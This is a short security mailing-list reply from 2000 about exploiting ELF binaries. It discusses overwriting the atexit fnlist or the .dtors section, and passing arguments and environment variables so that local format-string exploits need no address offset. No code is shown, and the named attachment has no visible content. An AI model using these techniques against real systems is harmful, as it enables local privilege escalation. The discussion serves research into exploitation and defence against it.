Re: Overwriting ELF .dtors section to modify program execution

[Pascal Bouchareine <pb () HERT ORG>]

On Fri, Dec 15, 2000 at 12:46:22PM +0100, Mariusz Woloszyn wrote:
> It's good to remind that if program calls exit() (most do) the fnlist is
> the best place to overwrite. As we described it in our Phrack article
> (http://phrack.infonexus.com/search.phtml?view&article=p56-5):

That anyone here should read if they did not already, really great.

> "The fnlist address is dependent on the libc library, so it
> will be the same for every process on a particular machine."

So true. I wrote a little note about atexit() "abusing" via an argv[]
structure (which is very similar to the fnlist one..).  I attach this
poor thing below, ftip.

Olaf Kirch was one of the first people to mention that an offset was
not needed when locally exploiting bugs, since our ability to pass
arguments/env vars to a vulnerable program, and to guess quite exactly
where they will reside in the process memory.

This becomes especially clean and easy to exploit format bugs.

Sorry for the attachement thing, I have no place to put it online for
the time being.

--
Kalou.
                             ldiq    t0, 0xbeeffedadeadbabe

Attachment: heap_atexit.txt
Description: